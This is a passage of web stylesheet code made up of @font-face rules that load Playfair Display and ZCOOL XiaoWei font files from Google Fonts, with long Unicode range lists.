url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.5.woff2) format(\'woff2\');unicode-range: U+fee3, U+fef3, U+ff03-ff04, U+ff07, U+ff0a, U+ff17-ff19, U+ff1c-ff1d, U+ff20-ff3a, U+ff3c, U+ff3e-ff5b, U+ff5d, U+ff61-ff65, U+ff67-ff6a, U+ff6c, U+ff6f-ff78, U+ff7a-ff7d, U+ff80-ff84, U+ff86, U+ff89-ff8e, U+ff92, U+ff97-ff9b, U+ff9d-ff9f, U+ffe0-ffe4, U+ffe6, U+ffe9, U+ffeb, U+ffed, U+fffc, U+1f004, U+1f170-1f171, U+1f192-1f195, U+1f198-1f19a, U+1f1e6-1f1e8;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.6.woff2) format(\'woff2\');unicode-range: U+f0a7, U+f0b2, U+f0b7, U+f0c9, U+f0d8, U+f0da, U+f0dc-f0dd, U+f0e0, U+f0e6, U+f0eb, U+f0fc, U+f101, U+f104-f105, U+f107, U+f10b, U+f11b, U+f14b, U+f18a, U+f193, U+f1d6-f1d7, U+f244, U+f27a, U+f296, U+f2ae, U+f471, U+f4b3, U+f610-f611, U+f880-f881, U+f8ec, U+f8f5, U+f8ff, U+f901, U+f90a, U+f92c-f92d, U+f934, U+f937, U+f941, U+f965, U+f967, U+f969, U+f96b, U+f96f, U+f974, U+f978-f979, U+f97e, U+f981, U+f98a, U+f98e, U+f997, U+f99c, U+f9b2, U+f9b5, U+f9ba, U+f9be, U+f9ca, U+f9d0-f9d1, U+f9dd, U+f9e0-f9e1, U+f9e4, U+f9f7, U+fa00-fa01, U+fa08, U+fa0a, U+fa11, U+fb01-fb02, U+fdfc, U+fe0e, U+fe30-fe31, U+fe33-fe44, U+fe49-fe52, U+fe54-fe57, U+fe59-fe66, U+fe68-fe6b, U+fe8e, U+fe92-fe93, U+feae, U+feb8, U+fecb-fecc, U+fee0;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.21.woff2) format(\'woff2\');unicode-range: U+9f83, U+9f85-9f8d, U+9f90-9f91, U+9f94-9f96, U+9f98, U+9f9b-9f9c, U+9f9e, U+9fa0, U+9fa2, U+9ff0-9fff, U+a001, U+a007, U+a025, U+a046-a047, U+a057, U+a072, U+a078-a079, U+a083, U+a085, U+a100, U+a118, U+a132, U+a134, U+a1f4, U+a242, U+a4a6, U+a4aa, U+a4b0-a4b1, U+a4b3, U+a9c1-a9c2, U+ac00-ac01, U+ac04, U+ac08, U+ac10-ac11, U+ac13-ac16, U+ac19, U+ac1c-ac1d, U+ac24, U+ac70-ac71, U+ac74, U+ac77-ac78, U+ac80-ac81, U+ac83, U+ac8c, U+ac90, U+ac9f-aca0, U+aca8-aca9, U+acac, U+acb0, U+acbd, U+acc1, U+acc4, U+ace0-ace1, U+ace4, U+ace8, U+acf3, U+acf5, U+acfc-acfd, U+ad00, U+ad0c, U+ad11, U+ad1c, U+ad34, U+ad50, U+ad64, U+ad6c, U+ad70, U+ad74, U+ad7f, U+ad81, U+ad8c, U+adc0, U+adc8, U+addc, U+ade0, U+adf8-adf9, U+adfc, U+ae00, U+ae08-ae09, U+ae0b, U+ae30, U+ae34, U+ae38, U+ae40, U+ae4a, U+ae4c, U+ae54, U+ae68, U+aebc, U+aed8, U+af2c-af2d;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.22.woff2) format(\'woff2\');unicode-range: U+9e30-9e33, U+9e35-9e3b, U+9e3e, U+9e40-9e44, U+9e46-9e4e, U+9e51, U+9e53, U+9e55-9e58, U+9e5a-9e5c, U+9e5e-9e63, U+9e66-9e6e, U+9e71, U+9e73, U+9e75, U+9e78-9e79, U+9e7c-9e7e, U+9e82, U+9e86-9e88, U+9e8b-9e8c, U+9e90-9e91, U+9e93, U+9e95, U+9e97, U+9e9d, U+9ea4-9ea5, U+9ea9-9eaa, U+9eb4-9eb5, U+9eb8-9eba, U+9ebc-9ebf, U+9ec3, U+9ec9, U+9ecd, U+9ed0, U+9ed2-9ed3, U+9ed5-9ed6, U+9ed9, U+9edc-9edd, U+9edf-9ee0, U+9ee2, U+9ee5, U+9ee7-9eea, U+9eef, U+9ef1, U+9ef3-9ef4, U+9ef6, U+9ef9, U+9efb-9efc, U+9efe, U+9f0b, U+9f0d, U+9f10, U+9f14, U+9f17, U+9f19, U+9f22, U+9f29, U+9f2c, U+9f2f, U+9f31, U+9f37, U+9f39, U+9f3d-9f3e, U+9f41, U+9f4a-9f4b, U+9f51-9f52, U+9f61-9f63, U+9f66-9f67, U+9f80-9f81;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.23.woff2) format(\'woff2\');unicode-range: U+9c82-9c83, U+9c85-9c8c, U+9c8e-9c92, U+9c94-9c9b, U+9c9e-9ca3, U+9ca5-9ca7, U+9ca9, U+9cab, U+9cad-9cae, U+9cb1-9cb7, U+9cb9-9cbd, U+9cbf-9cc0, U+9cc3, U+9cc5-9cc7, U+9cc9-9cd1, U+9cd3-9cda, U+9cdc-9cdd, U+9cdf, U+9ce1-9ce3, U+9ce5, U+9ce9, U+9cee-9cef, U+9cf3-9cf4, U+9cf6, U+9cfc-9cfd, U+9d02, U+9d08-9d09, U+9d12, U+9d1b, U+9d1e, U+9d26, U+9d28, U+9d37, U+9d3b, U+9d3f, U+9d51, U+9d59, U+9d5c-9d5d, U+9d5f-9d61, U+9d6c, U+9d70, U+9d72, U+9d7a, U+9d7e, U+9d84, U+9d89, U+9d8f, U+9d92, U+9daf, U+9db4, U+9db8, U+9dbc, U+9dc4, U+9dc7, U+9dc9, U+9dd7, U+9ddf, U+9df2, U+9df9-9dfa, U+9e0a, U+9e11, U+9e1a, U+9e1e, U+9e20, U+9e22, U+9e28-9e2c, U+9e2e-9e2f;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.24.woff2) format(\'woff2\');unicode-range: U+9a80, U+9a83, U+9a85, U+9a88-9a8a, U+9a8d-9a8e, U+9a90, U+9a92-9a93, U+9a95-9a96, U+9a98-9a99, U+9a9b-9aa2, U+9aa5, U+9aa7, U+9aaf-9ab1, U+9ab5-9ab6, U+9ab9-9aba, U+9ac0-9ac4, U+9ac8, U+9acb-9acc, U+9ace-9acf, U+9ad1-9ad2, U+9ad9, U+9adf, U+9ae1, U+9ae3, U+9aea-9aeb, U+9aed-9aef, U+9af4, U+9af9, U+9afb, U+9b03-9b04, U+9b06, U+9b08, U+9b0d, U+9b0f-9b10, U+9b13, U+9b18, U+9b1a, U+9b1f, U+9b22-9b23, U+9b25, U+9b27-9b28, U+9b2a, U+9b2f, U+9b31-9b32, U+9b3b, U+9b43, U+9b46-9b49, U+9b4d-9b4e, U+9b51, U+9b56, U+9b58, U+9b5a, U+9b5c, U+9b5f, U+9b61-9b62, U+9b6f, U+9b77, U+9b80, U+9b88, U+9b8b, U+9b8e, U+9b91, U+9b9f-9ba0, U+9ba8, U+9baa-9bab, U+9bad-9bae, U+9bb0-9bb1, U+9bb8, U+9bc9-9bca, U+9bd3, U+9bd6, U+9bdb, U+9be8, U+9bf0-9bf1, U+9c02, U+9c10, U+9c15, U+9c24, U+9c2d, U+9c32, U+9c39, U+9c3b, U+9c40, U+9c47-9c49, U+9c53, U+9c57, U+9c64, U+9c72, U+9c77-9c78, U+9c7b, U+9c7f-9c80;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.25.woff2) format(\'woff2\');unicode-range: U+98dd, U+98e1-98e2, U+98e7-98ea, U+98ec, U+98ee-98ef, U+98f2, U+98f4, U+98fc-98fe, U+9903, U+9905, U+9908, U+990a, U+990c-990d, U+9913-9914, U+9918, U+991a-991b, U+991e, U+9921, U+9928, U+992c, U+992e, U+9935, U+9938-9939, U+993d-993e, U+9945, U+994b-994c, U+9951-9952, U+9954-9955, U+9957, U+995e, U+9963, U+9966-9969, U+996b-996c, U+996f, U+9974-9975, U+9977-9979, U+997d-997e, U+9980-9981, U+9983-9984, U+9987, U+998a-998b, U+998d-9991, U+9993-9995, U+9997-9998, U+99a5, U+99ab, U+99ad-99ae, U+99b1, U+99b3-99b4, U+99bc, U+99bf, U+99c1, U+99c3-99c6, U+99cc, U+99d0, U+99d2, U+99d5, U+99db, U+99dd, U+99e1, U+99ed, U+99f1, U+99ff, U+9a01, U+9a03-9a04, U+9a0e-9a0f, U+9a11-9a13, U+9a19, U+9a1b, U+9a28, U+9a2b, U+9a30, U+9a32, U+9a37, U+9a40, U+9a45, U+9a4a, U+9a4d-9a4e, U+9a52, U+9a55, U+9a57, U+9a5a-9a5b, U+9a5f, U+9a62, U+9a65, U+9a69, U+9a6b, U+9a6e, U+9a75, U+9a77-9a7a, U+9a7d;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.26.woff2) format(\'woff2\');unicode-range: U+975b-975c, U+9763, U+9765-9766, U+976c-976d, U+9773, U+9776, U+977a, U+977c, U+9784-9785, U+978e-978f, U+9791-9792, U+9794-9795, U+9798, U+979a, U+979e, U+97a3, U+97a5-97a6, U+97a8, U+97ab-97ac, U+97ae-97af, U+97b2, U+97b4, U+97c6, U+97cb-97cc, U+97d3, U+97d8, U+97dc, U+97e1, U+97ea-97eb, U+97ee, U+97fb, U+97fe-97ff, U+9801-9803, U+9805-9806, U+9808, U+980c, U+9810-9814, U+9817-9818, U+981e, U+9820-9821, U+9824, U+9828, U+982b-982d, U+9830, U+9834, U+9838-9839, U+983c, U+9846, U+984d-984f, U+9851-9852, U+9854-9855, U+9857-9858, U+985a-985b, U+9862-9863, U+9865, U+9867, U+986b, U+986f-9871, U+9877-9878, U+987c, U+9880, U+9883, U+9885, U+9889, U+988b-988f, U+9893-9895, U+9899-989b, U+989e-989f, U+98a1-98a2, U+98a5-98a7, U+98a9, U+98af, U+98b1, U+98b6, U+98ba, U+98be, U+98c3-98c4, U+98c6-98c8, U+98cf-98d6, U+98da-98db;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.27.woff2) format(\'woff2\');unicode-range: U+95c4-95ca, U+95cc-95cd, U+95d4-95d6, U+95d8, U+95e1-95e2, U+95e9, U+95f0-95f1, U+95f3, U+95f6, U+95fc, U+95fe-95ff, U+9602-9604, U+9606-960d, U+960f, U+9611-9613, U+9615-9617, U+9619-961b, U+961d, U+9621, U+9628, U+962f, U+963c-963e, U+9641-9642, U+9649, U+9654, U+965b-965f, U+9661, U+9663, U+9665, U+9667-9668, U+966c, U+9670, U+9672-9674, U+9678, U+967a, U+967d, U+9682, U+9685, U+9688, U+968a, U+968d-968e, U+9695, U+9697-9698, U+969e, U+96a0, U+96a3-96a4, U+96a8, U+96aa, U+96b0-96b1, U+96b3-96b4, U+96b7-96b9, U+96bb-96bd, U+96c9, U+96cb, U+96ce, U+96d1-96d2, U+96d6, U+96d9, U+96db-96dc, U+96de, U+96e0, U+96e3, U+96e9, U+96eb, U+96f0-96f2, U+96f9, U+96ff, U+9701-9702, U+9705, U+9708, U+970a, U+970e-970f, U+9711, U+9719, U+9727, U+972a, U+972d, U+9730, U+973d, U+9742, U+9744, U+9748-9749, U+9750-9751, U+975a;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.28.woff2) format(\'woff2\');unicode-range: U+94f5, U+94f7, U+94f9, U+94fb-94fd, U+94ff, U+9503-9504, U+9506-9507, U+9509-950a, U+950d-950f, U+9511-9518, U+951a-9520, U+9522, U+9528-952d, U+9530-953a, U+953c-953f, U+9543-9546, U+9548-9550, U+9552-9555, U+9557-955b, U+955d-9568, U+956a-956d, U+9570-9574, U+9583, U+9586, U+9589, U+958e-958f, U+9591-9592, U+9594, U+9598-9599, U+959e-95a0, U+95a2-95a6, U+95a8-95b2, U+95b4, U+95b8-95c3;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.29.woff2) format(\'woff2\');unicode-range: U+941c-942b, U+942d-942e, U+9432-9433, U+9435, U+9438, U+943a, U+943e, U+9444, U+944a, U+9451-9452, U+945a, U+9462-9463, U+9465, U+9470-9487, U+948a-9492, U+9494-9498, U+949a, U+949c-949d, U+94a1, U+94a3-94a4, U+94a8, U+94aa-94ad, U+94af, U+94b2, U+94b4-94ba, U+94bc-94c0, U+94c4, U+94c6-94db, U+94de-94ec, U+94ee-94f1, U+94f3;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.30.woff2) format(\'woff2\');unicode-range: U+92ec-92ed, U+92f0, U+92f3, U+92f8, U+92fc, U+9304, U+9306, U+9310, U+9312, U+9315, U+9318, U+931a, U+931e, U+9320-9322, U+9324, U+9326-9329, U+932b-932c, U+932f, U+9331-9332, U+9335-9336, U+933e, U+9340-9341, U+934a-9360, U+9362-9363, U+9365-936b, U+936e, U+9375, U+937e, U+9382, U+938a, U+938c, U+938f, U+9393-9394, U+9396-9397, U+939a, U+93a2, U+93a7, U+93ac-93cd, U+93d0-93d1, U+93d6-93d8, U+93de-93df, U+93e1-93e2, U+93e4, U+93f8, U+93fb, U+93fd, U+940e-941a;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.31.woff2) format(\'woff2\');unicode-range: U+9163-9164, U+9169, U+9170, U+9172, U+9174, U+9179-917a, U+917d-917e, U+9182-9183, U+9185, U+918c-918d, U+9190-9191, U+919a, U+919c, U+91a1-91a4, U+91a8, U+91aa-91af, U+91b4-91b5, U+91b8, U+91ba, U+91be, U+91c0-91c1, U+91c6, U+91c8, U+91cb, U+91d0, U+91d2, U+91d7-91d8, U+91dd, U+91e3, U+91e6-91e7, U+91ed, U+91f0, U+91f5, U+91f9, U+9200, U+9205, U+9207-920a, U+920d-920e, U+9210, U+9214-9215, U+921c, U+921e, U+9221, U+9223-9227, U+9229-922a, U+922d, U+9234-9235, U+9237, U+9239-923a, U+923c-9240, U+9244-9246, U+9249, U+924e-924f, U+9251, U+9253, U+9257, U+925b, U+925e, U+9262, U+9264-9266, U+9268, U+926c, U+926f, U+9271, U+927b, U+927e, U+9280, U+9283, U+9285-928a, U+928e, U+9291, U+9293, U+9296, U+9298, U+929c-929d, U+92a8, U+92ab-92ae, U+92b3, U+92b6-92b7, U+92b9, U+92c1, U+92c5-92c6, U+92c8, U+92cc, U+92d0, U+92d2, U+92e4, U+92ea;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.32.woff2) format(\'woff2\');unicode-range: U+9004, U+900b, U+9011, U+9015-9016, U+901e, U+9021, U+9026, U+902d, U+902f, U+9031, U+9035-9036, U+9039-903a, U+9041, U+9044-9046, U+904a, U+904f-9052, U+9054-9055, U+9058-9059, U+905b-905e, U+9060-9062, U+9068-9069, U+906f, U+9072, U+9074, U+9076-907a, U+907c-907d, U+9081, U+9083, U+9085, U+9087-908b, U+908f, U+9095, U+9097, U+9099-909b, U+909d, U+90a0-90a1, U+90a8-90a9, U+90ac, U+90b0, U+90b2-90b4, U+90b6, U+90b8, U+90ba, U+90bd-90be, U+90c3-90c5, U+90c7-90c8, U+90cf-90d0, U+90d3, U+90d5, U+90d7, U+90da-90dc, U+90de, U+90e2, U+90e4, U+90e6-90e7, U+90ea-90eb, U+90ef, U+90f4-90f5, U+90f7, U+90fe-9100, U+9104, U+9109, U+910c, U+9112, U+9114-9115, U+9118, U+911c, U+911e, U+9120, U+9122-9123, U+9127, U+912d, U+912f-9132, U+9139-913a, U+9143, U+9146, U+9149-914a, U+914c, U+914e-9150, U+9154, U+9157, U+915a, U+915d-915e, U+9161-9162;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.33.woff2) format(\'woff2\');unicode-range: U+8e41-8e42, U+8e47, U+8e49-8e4b, U+8e50-8e53, U+8e59-8e5a, U+8e5f-8e60, U+8e64, U+8e69, U+8e6c, U+8e70, U+8e74, U+8e76, U+8e7a-8e7c, U+8e7f, U+8e84-8e85, U+8e87, U+8e89, U+8e8b, U+8e8d, U+8e8f-8e90, U+8e94, U+8e99, U+8e9c, U+8e9e, U+8eaa, U+8eac, U+8eb0, U+8eb6, U+8ec0, U+8ec6, U+8eca-8ece, U+8ed2, U+8eda, U+8edf, U+8ee2, U+8eeb, U+8ef8, U+8efb-8efe, U+8f03, U+8f09, U+8f0b, U+8f12-8f15, U+8f1b, U+8f1d, U+8f1f, U+8f29-8f2a, U+8f2f, U+8f36, U+8f38, U+8f3b, U+8f3e-8f3f, U+8f44-8f45, U+8f49, U+8f4d-8f4e, U+8f5f, U+8f6b, U+8f6d, U+8f71-8f73, U+8f75-8f76, U+8f78-8f7a, U+8f7c, U+8f7e, U+8f81-8f82, U+8f84, U+8f87, U+8f8a-8f8b, U+8f8d-8f8f, U+8f94-8f95, U+8f97-8f9a, U+8fa6, U+8fad-8faf, U+8fb2, U+8fb5-8fb7, U+8fba-8fbc, U+8fbf, U+8fc2, U+8fcb, U+8fcd, U+8fd3, U+8fd5, U+8fd7, U+8fda, U+8fe2-8fe5, U+8fe8-8fe9, U+8fee, U+8ff3-8ff4, U+8ff8, U+8ffa;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.34.woff2) format(\'woff2\');unicode-range: U+8cbd, U+8cbf-8cc4, U+8cc7-8cc8, U+8cca, U+8ccd, U+8cd1, U+8cd3, U+8cdb-8cdc, U+8cde, U+8ce0, U+8ce2-8ce4, U+8ce6-8ce8, U+8cea, U+8ced, U+8cf4, U+8cf8, U+8cfa, U+8cfc-8cfd, U+8d04-8d05, U+8d07-8d08, U+8d0a, U+8d0d, U+8d0f, U+8d13-8d14, U+8d16, U+8d1b, U+8d20, U+8d30, U+8d32-8d33, U+8d36, U+8d3b, U+8d3d, U+8d40, U+8d42-8d43, U+8d45-8d46, U+8d48-8d4a, U+8d4d, U+8d51, U+8d53, U+8d55, U+8d59, U+8d5c-8d5d, U+8d5f, U+8d61, U+8d66-8d67, U+8d6a, U+8d6d, U+8d71, U+8d73, U+8d84, U+8d90-8d91, U+8d94-8d95, U+8d99, U+8da8, U+8daf, U+8db1, U+8db5, U+8db8, U+8dba, U+8dbc, U+8dbf, U+8dc2, U+8dc4, U+8dc6, U+8dcb, U+8dce-8dcf, U+8dd6-8dd7, U+8dda-8ddb, U+8dde, U+8de1, U+8de3-8de4, U+8de9, U+8deb-8dec, U+8df0-8df1, U+8df6-8dfd, U+8e05, U+8e07, U+8e09-8e0a, U+8e0c, U+8e0e, U+8e10, U+8e14, U+8e1d-8e1f, U+8e23, U+8e26, U+8e2b-8e31, U+8e34-8e35, U+8e39-8e3a, U+8e3d, U+8e40;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.35.woff2) format(\'woff2\');unicode-range: U+8b80, U+8b83, U+8b8a, U+8b8c, U+8b90, U+8b93, U+8b99-8b9a, U+8ba0, U+8ba3, U+8ba5-8ba7, U+8baa-8bac, U+8bb4-8bb5, U+8bb7, U+8bb9, U+8bc2-8bc3, U+8bc5, U+8bcb-8bcc, U+8bce-8bd0, U+8bd2-8bd4, U+8bd6, U+8bd8-8bd9, U+8bdc, U+8bdf, U+8be3-8be4, U+8be7-8be9, U+8beb-8bec, U+8bee, U+8bf0, U+8bf2-8bf3, U+8bf6, U+8bf9, U+8bfc-8bfd, U+8bff-8c00, U+8c02, U+8c04, U+8c06-8c07, U+8c0c, U+8c0f, U+8c11-8c12, U+8c14-8c1b, U+8c1d-8c21, U+8c24-8c25, U+8c27, U+8c2a-8c2c, U+8c2e-8c30, U+8c32-8c36, 